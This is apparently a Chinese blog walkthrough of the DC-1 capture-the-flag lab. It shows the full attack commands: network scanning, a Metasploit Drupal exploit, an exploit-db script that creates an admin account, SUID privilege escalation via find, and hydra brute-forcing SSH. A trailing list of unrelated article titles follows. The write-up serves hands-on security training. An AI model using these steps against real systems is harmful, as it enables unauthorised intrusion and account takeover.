最新博客见我的个人博客地址

DC系列共9个靶场,本次来试玩一下DC-1,共有5个flag,下载地址

下载下来后是 .ova 格式,建议使用vitualbox进行搭建,vmware可能存在兼容性问题。靶场推荐使用NAT(共享)模式,桥接模式可能会造成目标过多不易识别。

首先在kali中扫一下目标ip

arp-scan -l

通过排除,发现目标ip为:192.168.0.119
经典套路,nmap扫一把

nmap -sS -sV 192.168.0.119

发现目标开启80和22端口
我们先看一下他的网页长啥样

是一个典型的drupal的CMS
立刻想到直接msf中search一下他的漏洞

msfconsole
search drupal

使用18年的那个试一下

shell进入命令行,python修饰一下shell,whoami发现自己已经进来了,是www-data用户

python -c 'import pty.pty.spawn("/bin/bash")'

成功发现当前目录的flag1.txt,提示我们要去查看drupal这个CMS的配置文件
上网搜索找到drupal的目录结构

cat /var/www/sites/default/settings.php

我们得到了flag2和数据库信息,当然可以考虑连接上数据库然后添加一个用户登录进网页的后台。我们这里采用另外一种方式。

searchsploit drupal

使用如下漏洞创建一个管理员账户

python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.0.119 -u haha123 -p haha123

登录后台发现flag3

flag3中提示我们可以使用SUID进行提权,SUID提权知识看这里
查看passwd和shadow,发现有flag4用户,但shadow没有权限查看
在www-data用户下查看什么命令能以root执行

find / -perm -4000 2>/dev/null

发现find

cd /tmp
touch 666
find / -name 666 -exec "/bin/sh" \;
whoami

发现自己已经是root了,提权成功。

然后再/home/flag4中找到flag4和/root中找到finalflag

或者我们还可以使用hydra尝试对flag4用户密码进行爆破

hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz 192.168.0.119 ssh

爆破出密码为orange

用ssh进行连接,成功登陆。

接下来依旧利用SUID进行提权。

最新文章

  1. POJ1947 Rebuilding Roads[树形背包]
  2. python 基本语法
  3. RabbitMQ入门教程——路由(Routing)
  4. Struts2类型转换器
  5. Android中的Adapter 详解
  6. 指定端口号,多线程扫描局域网内IP地址
  7. 使用DiskGenius对虚拟机磁盘进行压缩
  8. 在drawRect:方法中绘制图片,文字以及Core Graphics 框架的了解
  9. 微软微服务eShopOnContainers示例之EventBusRabbitMq解析与实践
  10. python3 字符串/列表/元组(str/list/tuple)相互转换方法及join()函数的使用
  11. spring boot项目能启动打包失败
  12. asp.net core 2.0发布到IIS流程及报错解决方案
  13. Linux Free命令每个数字的含义 和 cache 、buffer的区别
  14. POJ 3662 Telephone Lines (二分 + 最短路)
  15. springcloud之eureka配置——eureka.instance
  16. SpringBoot配置发送邮件
  17. goconfig - INI 解析器
  18. leetcode笔记:Bulls and Cows
  19. ios中LeveyPopListView 弹出view的用法
  20. bootstrap重置校验方法

热门文章

  1. 程序挂了之后别再跟我说让我帮你重启啦! 让supervisor帮你搞定...
  2. Clean Architecture For RazorPage 实现多语言和本地化
  3. 前后端数据交互(六)——ajax 、fetch 和 axios 优缺点及比较
  4. noip模拟45
  5. [CVE-2020-1956] Apache Kylin远程命令执行漏洞复现
  6. 法术迸发(Spellburst)
  7. WPF 通过进程实现异常隔离的客户端
  8. Hadoop 2.x安装
  9. 机器学习——支持向量机SVM
  10. 3.8学习总结——Android保存信息